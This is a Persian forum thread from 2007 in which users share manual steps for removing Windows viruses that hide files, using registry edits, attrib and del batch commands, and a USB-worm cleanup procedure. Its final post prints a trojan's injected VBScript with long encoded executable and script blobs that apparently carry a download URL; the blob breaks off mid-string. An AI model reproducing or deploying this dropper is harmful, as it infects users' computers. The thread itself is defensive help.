ورود

نسخه کامل مشاهده نسخه کامل : اونایی که فایلهاشون مخفی شده بیان اینجا



winxp
12-10-2007, 02:17
سلان به همه شکست خورده ها

اگه فایل مخفیت دیده نمیشه یا فعال نمیشه این کار ها رو بکن

دوستان هر راهی به نظرشون میرسه بگن

موفق باشین همگی
:11:

winxp
12-10-2007, 02:18
به نام خدا



و حالا طریقه پاک کردن دستی این ویروس رو براتون میگم
اول این که چه طوری بفهمیم همچین ویروسی گرفتیم و نشانه هاش چیه
1-برین task manager تو قسمت پروسه ها بگردین ببینین ایا از services.exe دو تا دارین یا نه
2-برین ادرس C:\Documents and Settings\welcome\Local Settings\Temp و اونجا ببینین پوشه ای به اسم services.exe
هست یا نه
3-برین folder options بعد سربرگ view و گزینه های show hidden files و hidde protected oprations system files
رو فعال کنین , و پنجره رو ببندین و دوباره برین همون قسمت ببینین گزینه hidde protected oprations system files تیک خورده یا نه در حالی که شما تیکشو ورداشته بودین
4-برین مثلا درایو d:\mp3 و رو پوشه مثلا حمید دابل کلیک کنین و بعد برگردین d:\mp3 , حالا از پوشه حمید properties بگیرین ببینین 37 kb نشونمیده یا نه
5-برین run\regedit\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon
حالا در سمت راست بگردین دنبال یه value به نام Shell , ببینین مقدارش با این برابر یا نه explorer.exe "C:\DOCUME~1\welcome\LOCALS~1\Temp\services.ex e"
6-برین همون پوشه حمید که حجمش 37 kb هست , حالا اون رو rename کنین به مثلا xp و دوباره برین توش و ببینین داخلش mp3 داره یا نه

بله اینا همه نشانه های وجود این ویروس در سیستم شماست که با بروز این ویروس به سیستم شما همه این نشانهها ظاهر میشه
و حالا طریقه پاک کردنش
اول یه چیزی بگم
من ویروس نوشتن بلد نیستم ولی خیلی دوست دارم یاد بگیرم چون کرمم خیلی زیاد و اگه ویروس بنویسم یه کرمی درست میکنم که راه پاک کردنش فقط تعویض هارد باشه

اول از همه باید برین ریجستری به دستور زیر
run\regedit\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon
حالا اون شلی رو که گفتم باز کنین و مقدار داخلشو پاک کنین و اینو به جاش بنویسین explorer.exe
حالا registry رو close کنین و سیستم رو هم log off
دوباره login بشین و قبل از هر کاری رو my computer راست کلیک کنید و serach بزنین , حالا all files and folder رو انتخاب کنین و سپس پایین تر از
فیلد look in کادر کشویی what size is it و more advanced options رو باز کنید
از wha size is it روی specify size کلیک کنید و مقدار at least رو به at most تغییر بدین و مقدار صفر رو هم به 37 kb تغییر بدین
حالا بیاین تو قسمت more advanced option که باز کردین و از قسمت type of file مقدار application رو اتخاب کنین و 3 گزینه ی
search system files , search hidden files and folder , search subfolders رو هم تیک بزنین
و رو search کلیک کنین
حالا دنبال فایلهایی میگرده که حجمشون کمتر از 38 و پسوندشون exe هست
بعد از اتمام عملیت شما باید اون فایلهایی رو که دقیق حجمشون 38 kb است و شکلشون مثله پوشسه میمونه رو انتخاب و delete کنید
لازم به یاد اوری هست که اگه رو یکی از این پوشه ها دابل کلیک کنید ویروس دوباره اجرا شده و باید همه مراحل رو دوباره طی کنین
حالا چی کار کنیم که فایلهایی که مخفی شدن رو از حالت مخفی در بیاریم
یه new text باز کنید و توش بنویسید
attrib -s -h [drive:][path][filename]
حالا باید به جای [drive:][path][filename] ادرس فایلهایی رو که مخفی شدن رو بنویسید که اینم ترفند داره
تو همون search تمام فایلهایی رو که ویروسی شدن رو پیدا میکنه و این یهنی فقط همون فایلها مخفی شدن و شما ادرس اون فایلها رو میخواین نه چیز دیگه , پس قبل از پاک کردن فیلها از ریجستری باید ادرساشون رو ورداریم
برا ساده شدن این کار بیاین رو همو ویروسها right click\propeties برین و از قسمت location ادرسش رو کپی کنین تو فایل text که ساختین و در اخر فقط اسمه فایل رو
باید به ادرس اضافه کنین
مثلا
attrib -s -h E:\film sho mp3\sho\American\video\enrique
attrib -s -h d:\mp3\hamid
attrib -s -h c:\windows
و ...
حالا که همه ادرسهارو درست کردین برین فایل رو با پسوند bat ذخیره کنین و اجراش کنین
چند تا نکته دیگه
یکی این که نمیخواد دستور زیر رو بنویسید
attrib -s -h C:\Documents and Settings\welcome\Local Settings\Temp\services
چون که از این فایل مخفیش وجود نداره
و دیگری این که اگه میخواین کارتون سریعتر راه بیفته میتونین از برنامه زیر استفاده کنین
attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d
این برنامه میاد هر چی فایل مخفی دارین رو unhidde میکنه و دیگه نیازی به اون همه ادرس ورداشتن و این حرفا نیست
حالا شما تونستین یه ویروس رو بدون انتی ویروس پاک کنید و شروعی باشه برا انتی شدن
فکر کنم کامل باشه
موفق باشین


@echo off

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\NOHIDDE N" /v CheckedValue /t reg_dword /d "2" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\NOHIDDE N" /v DefaultValue /t reg_dword /d "2" /f

reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f

reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v DefaultValue /t reg_dword /d "2" /f

winxp
12-10-2007, 02:20
این هم ادسرس همین برنامه که همین کارهارو میکنه


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

winxp
12-10-2007, 02:21
اینم یه راه از دوست عزیزم drxox

سلام

مشکل اصلی رو پیدا کردم و همین طور راه حلش

همیشه به تمام کسانی که دچار مشکلات ویروسی بودند توصیه اکید می کردم که کامپیوتر خود را به یک آنتی ویروس قوی که امکان به روز شدن دارد مجهز کنند.اگر به اینترنت متصل می شوند در کنار آنتی ویروس ، دیواره آتش (Firewall) نصب کنند. از گشودن فایل های و ایمیل های مشکوک شدیدا خودداری کنند و قبل از استفاده از هر گونه فلاپی دیسک، CD یا حافظه های فلش از پاک بودن آنها مطمئن شوند.اما انگار با تمام دقتی که می کنم باز هم به ویروس آلوده شده ام.البته آنطور که خودم حدس می زنم باید یک تروجان سمج و البته بسیار زیرک باشد!
در مرحله اول باید بگویم که هیچ یک از آنتی ویروس های رایج مانند NOD32 ، Kaspersky ، Norton آن را پیدا نمی کند.
تنها Bitdefender آن را می شناسد که البته نمی تواند پاکش کند (همه این آنتی ویروس با آخرین آپدیتشان آزمایش شده اند)
اما برسیم به علامات و مشخصه های آلودگی سیستم.در مرحله نخست آلوده شدگی شما با اخطاری از طرف برنامه Soundmix مواجه می شوید که از وجود خطایی جدی در سیستم خبر می دهد.با زدن همزمان کلیدهای Ctrl ، Alt و Del پنجره Task Manager را خواهید دید.به تب پروسس (Processes ) بروید.در آنجا می توانید soundmix را ببینید.سعی کنید با زدن بر روی End Process آن را ببندید.مشکل همین جاست :نمیتوانید !شما آلوده شده اید


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



خرابکاری های ویروس : هنگامی که کامپیوتر شما به این ویروس آلوده شود دیگر نخواهید توانست فایل های پنهان شده تان (Hidden) را ببینید.منوی Folder Option باز می شود اما گزینه Show Hidden files and folder کار نمی کند.خود ویروس هم که در پوشه System32 ویندوزتان هم قرار دارد خود را مخفی کرده است.پس از گسترش ، ویروس مانع دسترسی شما به تنظیمات رجیستری (از طریق regedit ) می شود.با رشد ویروس ، سرعت ویندوز کندتر و کندتر می شود.
سرعت گسترش این ویندوز در بین کامپیوترها واقعا وحشتناک است و به جرات می توانم بگویم کامپیوتر های آلوده در چهارشنبه گذشته از دو دستگاه به بیش از صد دستگاه در شنبه رسیده است (با حساب یک جمعه تعطیل و پنجشنبه نیمه تعطیل در یک مانند دانشگاه)متاسفانه تمام تلاش های من برای پیدا کردن راه درمان آن بی نتیجه ماند و به شکل دیوانه کننده در حال گسترش است.اگر کسی راه پاک کردن آن و خلاص شدن از شر آن را میداند لطفا من را هم راهنمایی کند.
نکات اضافی :
پاک کردن آن با برنامه های رایج ضدتروجان بدلیل تغییری که برنامه در config داده است باعث خراب شدن ویندوز می شود. بعلاوه بدلیل اینکه ویروس خود را در مموری کپی کرده است با هر بار لود شدن ویندوز دوباره ویروس به شما سلام خواهد کرد.
در مدت تلاش برای پاک کردن ویروس به یک پدیده جالب هم برخوردم.برای اولین بار دیدم که یک ویروس خود را در حالت Safemode هم لود می کند.شاید اگر بتوان اسم اصلی ویروس یا تروجان را فهمید کشتن آن راحت تر شود.مشکل شناخته نشدن توسط آنتی ویروس هاست.

عمده ترین راه گسترش این ویروس ، از طریق حافظه های قابل حمل (FlashMemory،Mp3 Player و …) است.در نتیجه قبل از اتصال این وسایل به کامپیوتر از عاری از ویروس بودن آنها مطمئن شوید.
برای جلوگیری از تائیر ویروس بر روی کامپیوترتان ، در درایوی که ویندوز را در آن نصب کرده اید یک فایل متنی بدون محتوا با فرمت TXT و با نام stop بسازید یعنی stop.txt (این روش پیشگیری است و اثرات مخرب ویروس را از بین نمی برد)


آنتی ویروسش هم از لینک زیر می تونید دانلود کنید

حجم : 17.4KB
کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

DrXoX
12-10-2007, 02:55
سلام

winxp جان خیلی عالیه خیلی از دوستان با این مشکل رو به رو شدن

تاپیک خیلی خوبیه برای دوستانی که این مشکل رو دارن بیان مشکلشون رو حل کنن و همین طور اگه راهی ، روشی ، ترفندی برای حل این مشکل خانمانسوز دارن بیان کنن تا بقیه هم استفاده کنن

farhad resalati
12-10-2007, 06:09
دوستان یه مشکلی هم من دارم میدونم ویروس نیست و نرم افزاری حل میشه اما نمیدونم چجوری
و اون این هست که گزینه folder option از منوی Toolsتو کامپیوتر من حذف شده هر کاری کردم پیداش نکردم فقط 3 گزینه :map network drive
disconnect network drive
synchronize هست ممنون میشم سریع جوابم رو بدین

mahdi7610
12-10-2007, 10:15
دوستان یه مشکلی هم من دارم میدونم ویروس نیست و نرم افزاری حل میشه اما نمیدونم چجوری
و اون این هست که گزینه folder option از منوی Toolsتو کامپیوتر من حذف شده هر کاری کردم پیداش نکردم فقط 3 گزینه :map network drive
disconnect network drive
synchronize هست ممنون میشم سریع جوابم رو بدین

سلام

ابتدا توی run عبارت gpedit.msc را بنویس از صفحه باز شده به مسیر زیر برو
user configration\adminstator tempelet\windows component\windows explorer\\remove the folder option menu سپس روی اون دوبار کلیک کن و ابتدا disable را انتخاب کن و ok کن بعد دوباره برگرد و گزینه not configred را انتخاب کن

mahdi7610
12-10-2007, 10:16
winxp دستت درد نکنه عالی بود

farhad resalati
12-10-2007, 20:41
اقا مهدی دمت گرم ممنون مشکلم به دستت باز شد حالا عزیز ای کاش میگفتی این ایراد چطور بوجود میاد ؟چون من کار خاصی نکردم و سیستم های شرکتمون هم این طوری شدن .

mahdi7610
12-10-2007, 22:47
اقا مهدی دمت گرم ممنون مشکلم به دستت باز شد حالا عزیز ای کاش میگفتی این ایراد چطور بوجود میاد ؟چون من کار خاصی نکردم و سیستم های شرکتمون هم این طوری شدن .


سلام :46:
خوشحالم مشکلت حل شد .
راستش دلیل اصلی اون ویروس ها می باشند گاهی اوقات ویروس ها بعضی از فایلهای سیستمی را الوده می کنند و وقتی انتی ویروسی فایل الوده را پیدا می کند به دلیل این که در حالت عادی قادر به پاک کردن انها نمی باشد به همین دلیل باعث ایجاد اختلال در عمکرد ان می شود و در واقع به جای پاک کردن ان عمکرد ان را از کار می اندازد .
و گاهی اوقات نیز باعث این مشکل عملکرد بعضی از نرم افزارها می باشند

:11:

farhad resalati
12-10-2007, 23:26
سلام :46:
خوشحالم مشکلت حل شد .
راستش دلیل اصلی اون ویروس ها می باشند گاهی اوقات ویروس ها بعضی از فایلهای سیستمی را الوده می کنند و وقتی انتی ویروسی فایل الوده را پیدا می کند به دلیل این که در حالت عادی قادر به پاک کردن انها نمی باشد به همین دلیل باعث ایجاد اختلال در عمکرد ان می شود و در واقع به جای پاک کردن ان عمکرد ان را از کار می اندازد .
و گاهی اوقات نیز باعث این مشکل عملکرد بعضی از نرم افزارها می باشند

:11:

فکر میکنم دومی درست تر باشه در باره سیستم من چون اولا انتی ویروس و فایروالم همیشه اپدیتن(nod ,&out post( ثانیا انواع نرم افزار ها رو رو سیستم ذغالیم نصب میکنم این رنم افزارهایی که با vb نوشته میشن که دیگه نگو مخصوصا این ایرانی ها به هر حال ممنونم ازت

Alireza.M67
12-10-2007, 23:43
دمتون گرم
دمتون گرم
دمتون گرم
دمتون گرم
دمتون گرم
دمتون گرم
دمتون گرم

کار کرد با آنتی ویروس درست شد .
حالا میشه فایلهای هاید شده رو دید .

winxp
15-10-2007, 01:32
quote=hossein_61;1705600]
من حدود دو هفته است كه كامپيوترم با وجود آنتي ويروس kaspersky مبتلا به اين ويروسه . اما تونستم اطلاعاتي در مورد اين ويروس به دست بيارم و اونو از بين ببرم . اگه كسي اطلاعات بيشتري در مورد اين ويروس داره به بقيه هم بگه !


ویروس Win32/PSW.Agent.NDP که به تازگی وارد اینترنت شده با غیرفعال کردن گزینه
show hidden files and folders در folder option باعث عدم نمایش فایلهای مخفی می شه و نمی زاره که کاربرها فایلهایي كه مخفی کردن رو ببینن. این ویروس با دستکاری تو رجیستری ویندوز باعث می شه که شما نتونید تنظیمات hidden file and folder را تغییر بدید. به محض تغییر دادن این قسمت و خارج شدن از اون تنظیمات به حالت پیش فرض خود برمیگرده . البته این ویروس خرابکاریهای دیگه ای هم داره اول اینکه تو تمام درایوهای شما یه فایل autorun.inf می سازه که درایوهای هارد رو autorun می کنه.
دوم اینکه دوباره تو تمام درایوها یه فایل دیگه به نام ntde1ectمی سازه که شما به محض اینکه فلاپی وارد سیستم کنید یا فلش یا mp3 pleyer را به کامپیوتر متصل کنید یه کپی از خودش به صورت hidden وارد دستگاه شما یا فلاپی شما می کنه . البته فایل ntde1ect خیلی شبیه فایل ntdetect هست که توی درایو C وجود داره و برای بالا اومدن ویندوز ضروریه . اینو گفتم یه وقت این دوتا رو با هم اشتباه نگیرید . اگر خواستید این فایلهای مخرب رو توی درایوهای هاردتون ببینید می تونید با استفاده از برنامه nero این کار رو بکنید . سوم اینکه با اجرای فایل avpo.exe به شما اجازه نمیده که فلش یا mp3 pleyer یا هر چیز دیگه رو از پورت USB ، safe remove کنید .
تا چندی پیش آنتی ویروس های node32 و Kaspersky با وجود update شدن این ویروس رو تشخیص نمی دادن اما حدود یک هفته است که آنتی ویروس node32 اگه به روز بشه این ویروس رو می شناسه و اونو delete می کنه . اما اگه شما نتونستید با آنتی ویروس این ویروس رو از بین ببرید روش پاک کردن این ویروس رو به صورت دستی براتون نوشتم که خیلی آسونه می تونید امتحان کنید که 100% جواب میده .



روش پاک کردن :


1. در حالت safe mode وارد ویندوز شوید . ( با زدن دکمه F8 قبل از بالا آمدن ویندوز حالت safe mode را انتخاب کنید )
2. پنجره Task Manager را باز کنید (Ctrl-Alt-Del) و برنامه های زیر را در صورت اجرا ببندید .
wscript.exe : اگر در حال اجرا بود آن را ببندید (End process)
avpo.exe : اگر در حال اجرا بود آن را ببندید (End process)
3. از قسمت start برنامه Run را اجرا کنید و در عبارت cmd را در آن تایپ کنید و enter را بزنید .
4. در این قسمت در خط فرمان برنامه ، دستور زیر زیر را تایپ کنید و enter را بزنید .

del c:\autorun.* /f /a /s /q

این دستور را برای درایوهای دیگر اجرا کنید . با این دستور تمام فایلهایautorun موجود delete می شود .
قبل از این کار اگر در درایوها فایل autorun دارید که فکر میکنید به دردتون می خوره ، اول از این فایل backup بگیرید بعد دستور بالا رو اجرا کنید .
5. در این مرحله در خط فرمان c:\ دستور زیر را تایپ کنید تا وارد پوشه system32 شوید :

C:\cd windows\system32
C:\windows\system32

6. در ادامه دستور زیر را تایپ کنید و آنرا اجرا کنید .

*.*dir /a avp

7. در این قسمت هر فایلی به نامهای avp0.dll و avpo.exe و avp0.exe دیده شد آنرا پاک کنید .

attrib -r -s -h avpo.exe
del avpo.exe

8. بعد از این مراحل تمام پنجره ها رو ببندید و برنامه registry را اجرا کنید :
(Run \regedit)
مسیر زیر را دنبال کنید :
HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run

در این قسمت هر کلیدی که به نام avpo.exe بود را delete کنید .
9. در برنامه registry قسمت edit گزینه Findرا کلیک کنید و عبارت
ntde1ect را جستجو کنید. تمام کلیدهای پیدا شده را delete کنید .
این کار را برای فایل avpo.exe نیز انجام دهید و تمام کلیدهای پیدا شده راdelete کنید .
10. در آخر کار سراغ کلید زیر بروید و مقدار CheckedValue را برابر 1 قرار دهید .


HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Explorer/Advanced/Folder/Hidden/SHOWALL


نکته خیلی مهم : اگه این ویروس رو با آنتی ویروس از بین بردید باید مرحله 10 رو خودتون انجام بدید تا بتونید فایلهای hidden رو ببینید .
حسين آقاجان:5:
[/quote]

winxp
16-10-2007, 00:45
سلام.دوستان من ویندوزما جدید نصب کردم ( دیروز ) اما از دیروز مرتب این پیغام خطا میاد روی صفحه!!! این مال چیه چی کار کنم؟

D:\windows\system32\systems.exe
the NTVDM CPU has encountered an illegal instruction.
CS:0550 IP:011d OP:2e 63 6f 20 choose close to terminate the application.


جواب


اول Start رو بزن بعد Run توی Run تایپ کن msconfig .برو توی سربرگ Startup توی اونجا چکمارک یا همون تیک کنار kernel.exe رو بردار این کار باعث میشه که kernel دیگه لود نشه.بعد Crtl+Alt+Delet رو بزن تو سربرگ Processes روی kernel کلیک کن و End Processes رو بزن.حالا برو تو D:\WINDOWS\system32 دو تا فایل kernel.exe و kernel.vbs رو پاک کن.شما با این کار به صورت دستی تروجان رو پاک کردی اما حالا بهتره که یه Antivirus که این فایل رو بشناسه یعنیBitDenfender رو بریزی اون وقت یه بار سیستمو اسکن میکنی و هر وقت خواست این Kernel لود بشه BitDenfender میپرسه که اجازه فعالیت بهش بده یا نه که شما حالشو میگیریو No رو میزنی. تا حالا شما خود تروجان رو پاک کردی اما این تروجان توی تمام فایل های htm یا همون صفحه های اینترنت کد زیر رو وارد کرده:کد:on error resume nextfileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 40790000000000000000000000000000000000000000000000 00080069000000076001003000081115047069000000000000 00000000000022400001500101100100501200000200000000 00300060000000000000000070170000000000160000000000 32000000000000064000000016000000000002000000004000 00000000400000000000400000000000000000000000008000 60000000040000001390390000000020000000000000000160 00000016000000000000016000000016000000000000000000 01600000000000000000000000000000000006803200000010 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00003200000006800000000000000000000000000000000000 00000000000000000000000000000000000000000000000461 16101120116000000000240001000000000016000000000002 00000000000400000000000000000000000000000000000000 00000320000000960461141000971160970000002500010000 00000032000000000002000000000006000000000000000000 00000000000000000000000006400000006404610009711609 70000000001280270060000000480000000000020000000000 08000000000000000000000000000000000000000000064000 00019200000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000001060001060001060001060011060 00232207001000000163112075070000106000104000000000 12810600010600010404104806400025505311207507000023 21810010000001631160750700001041200750700001041280 26006000104240048064000255053116075070000232156001 00000010400400100000010412407507000023223100000000 01040280480640001041240750700002322440000000001040 00016000000104088048064000104124075070000232202000 00000016322404806400010600010422804806400025505312 00750700001042400480640002550532240480640002321740 00000000255053224048064000232145000000000255053112 07507000023203200100000025505311607507000023202100 10000001060051060001060001041240750700001060001060 00232073000000000195085139236131196228106000106000 10600014106922808023206300000000001119211602014106 92280802320620000000001410692280802320350000000002 35217201195104000016064000104224147004000106000106 00023202400000000023218525525525519525503702003206 40002550370400320640002550370360320640002550370320 32064000255037028032064000255037000032064000255037 01203206400025503700803206400025503700403206400020 42042042042042042042042042040851392360872551170082 32036000000000139125008139077012003248051210051192 13800401013600405813119400113219211724309513906900 82011940080002042042040851392361390690081312320041 31192004128056000116048128120001000116032128120002 00011601612812000300011723004306900813119200320119 40040000430690081311920022011940040000430690081311 92001201194004000043069008201194004000255037060032 06400025503704803206400025503705203206400025503705 60320640000000000000000000000000000000000000000000 00000000086033000000134033000000122033000000100033 00000000000000000023603200000000000000000005403300 00000420330000000280330000000080330000000000000000 00182033000000198033000000218033000000160033000000 00000000000018803200000000000000000000000000000025 20320000000200320000001960320000000000000000000000 00000000074033000000028032000000168032000000000000 00000000000000000014603300000000003200000021603200 00000000000000000000000000002380330000000480320000 00000000000000000000000000000000000000000000000000 00000000000008603300000013403300000012203300000010 00330000000000000000002360320000000000000000000540 33000000042033000000028033000000008033000000000000 00000018203300000019803300000021803300000016003300 00000000000000001030000831041011081080691201010991 17116101065000115104101108108051050046100108108000 14000006810511511209711609910407710111511509710310 10650000000250010711011160771011151150971031010650 00023002083101116084105109101114000000066002084114 09711011510809711610107710111511509710310100000011 71151011140510500461001081080000000260000671081111 15101072097110100108101000060001071101116083121115 11610110906810511410109911611111412106500020200107 91121011100701051081010000001580020871141051161010 70105108101000107101114110101108051050046100108108 00000010500007311011610111411010111606710811111510 10720971101001081010001340000731101161011141101011 16079112101110065000135000073110116101114110101116 07911210111008511410806500000014200007311011610111 41101011160821010971000701051081010000001191051101 05110101116046100108108000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000920831211151161011091 15046101120101000104116116112058047047104049046114 10511211909712104609911110904710011410109710910409 70991070470720470780971181051001040970991070461011 20101000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000000000000"filevbs1="03907809711810510003211010111903211810511411711503 20500480480540400490510550530460490410130101111100 32101114114111114032114101115117109101032110101120 11601301010010510903210210510810110411610904411512 11150441211140130101021051081011041161090490610340 49048048049048053049048057048051050049049053049050 04904904905304804905104804904804805605104904804904 90490540480510500490480480490480500480510500480540 49048051050049048048049049049048057057049049055049 04805704904804904904904804904905404805205404805705 70490490520490480490480570550490490540490480490480 54057049048056049048049049048057049048049049049048 04904905404805204804805105204904904904805705604904 80540490480490480570570490490540480510520480520490 48049051048049048049048048049048050048052054049049 05304904804904904905404805405304904905404904905404 90490520490480530480570560490490550490490540490480 49048051050048051052048057057049048056048057055049 04905304904905304904805304904804804805105204805205 20480510500480510520480570570490480560490490530490 48053049048048048053056048054054048054056048053055 04805305204805405504805305104805305104805305204805 20530480530520480530510480540530480530490480520530 48052057048052057048054056048052056048052053048053 05504805305404805304904805405304805205304805205604 80520560480540550480520560480530500480550480480540 55048053048048053055048054057048053049048053052048 05105004805105204804905104804904804904905304904804 90490490540480510500490480500490490530490490490480 51050048054049048051050049048048049048050048052054 04805705704904905204904804904805705504904905404904 80490490490490480570560490480540490480490480570570 49049054048052048048051052048056051048057057049049 05204904805304904905004904905404904805304904904804 90480510480520540480550480490480530490480560490480 49048056051049050049049049053049049054049048049049 04805704805505704805705604904805404904804904805705 70490490540480510520480520520480510520480510520480 52049048049051048049048049049053049048049049049054 04805105004904905304805404904904804804904805004805 20540480540550490490520490480490480570550490490540 49048049048055057048057056049048054049048049048057 05704904905404805204804805105204805605104904805204 90480490490480560490480560480520540480540530490490 50049049050049048056049048053048057057048057055049 04905404904805304904904904904904804805205404805205 70480510520480520520480510520480510520480520490480 49051048049048049049053049048049049049054048051050 04904905204904804904805404904904804804904805004805 20540480570570490490520490480490480570550490490540 49048049049049049048057056049048054049048049048057 05704904905404805204804805105204904905704904905304 80570570490490520490480530490490500490490540480520 54049049053049048052049048049049048056049048056048 05105204805205204805105204805105204805204904804905 10480490480490490530490500490490490530480540490490 48050049049053049049049048052054048055049049048049 04904905404805605104904905004904804904805705704904 80530480570550490480560480550480490490490490480560 49048048049048049049049052048052048048052057048052 04904804905104804904804805504804904904904904905204 80510500480570550480510500480540490480510500480520 57048051050048056052049049049048051050048055054049 04804904904904804805204804904805004904805304904805 60490480490490490560480570560490490530480520570480 52049048051050048056051049049054049048049049049050 04805105004805304904804905104804904804904805004904 80530490480560490480490490490560480570560490490530 48053048048054049049048050049048053049048056049048 04904904905604805705604904905304805304804805105004 80510560480510500480570570490480520490490520480520 48049048057049048053049048048048052048049048050049 04805304904805604904804904904905604805705604904905 30480520570480520520480570550480520520480530490480 52049048052049048049051048049048049048053049048050 04805105004805705504805105004805404804805105004904 80560490480490490490480480520480490480500490480530 49048056049048049049048049049050048049048049048052 05704805204904805205104805205704805105004904905404 90480520490480490490490480480510500490480500490480 53049048056049048049049048049049050048049048049048 05304804805404904904805004904805304904805604904804 90490480490490500480490480490480530480480510500480 51056048051050048057057049048052049049052048052048 04904805704904805304904804804805204804904805004904 80530490480560490480490490480490490500480490480490 48052057048052052048057055048052052048053049048052 04904805204904804905104804904804904904804904804904 90500480490490540480490510480490480490480550490490 52048051050048054049048051050048056053048054055048 05705504904905304904804904805204804904905204904804 90480520540480560500490480490490480510480560500490 48049048057055049048048048052048048051052048055050 04805505304805405704805605704805705304805505404805 50570480540550480540530480550540480570530480550550 48054053048054055048055050048055051048055056048054 05704805705004805605104805505704805504804805605204 80560550480540530480560500480540570480570500480550 55049048053048057057049049052049049049049049053049 04904904904805004904905404805705004805605504904805 30490490480490480480490490490490490570490490530480 57050048054055049049055049049052049049052049048049 04904904804904905404805605404904804904904905204904 90530490480530490490490490490480480570500480560500 49049055049049048048057050048055055049048053048057 05704904905204904904904904905304904904904904805004 90490540480510500480560550490480530490490480490480 48049049049049049057049049053048051052048052049048 05204904804905104804904804904805004904905304904904 90480520540480540550490490520490480490480570550490 49054049048049048056052049048049049050048049049054 04805504804904805304904805604904804904805204804904 90530490500490490490530480510500480510560480510500 48051052048057050048056052048056051048056048048053 04904805304804805405704805205404805405604805505404 80550540480510520480520490480520540490490570490490 52049048053049049054049048049048051050049048050049 04805304904805604904804904904804904905004804904804 90480520570480490510480490480490480530490480500480 51050049049055048057057048057055049049053049048049 04805204804904805004904905304904904904805205404805 50480490480530490480560490480490480540570490500480 49048053049049053049049054049049053048052048049049 05304905004904904905304805105004805105604805105004 80510520480570500480550530490480490490490520490490 48049048049049048056048052054049048049049050048049 04804904805105204805204904805204904805404904805105 20480550480480540530480550540480560510480540570480 51052048051050049049049049049052048051050049048055 04904905204805404804805405004904905504805705704805 70550490490530490480490480520480490490530490500490 49049053048051050048051056048051050048051052048057 05004805505304805405704805605004805505604805405704 80550540480520540480540570480560560480540570480510 52048052049048051050049049054049048052049048049049 04904804804905104804904804904905204904804904805205 40490490520490480490490480510490490570490490520490 48053049049054049048049048051050048051052048055050 04805505304805405704805605704805705304805505404805 50570480540550480540530480550540480570530480550550 48054053048054055048055050048055051048055056048054 05704805705004805605104805505704805504804805605204 80560550480540530480560500480540570480570500480550 55049048053048057057049049052049049049049049053049 04904904904805004904905404805705004805605504904805 30490490480490480480490490490490490570490490530480 57050048054055049049055049049052049049052049048049 04904904804904905404805605404904804904904905204904 90530490480530490490490490490480480570500480560500 49049055049049048048057050048051052048051050048051 05604805105004805105204805505504904805304805705704 90490520490490490490490530490490490490480500490490 54048051050048056055049048053049049048049048048049 04904904904905704904905304805105204805105004805205 20490490530490500490490490530480510500480510560480 51052048057050048055053049048049049049052049049048 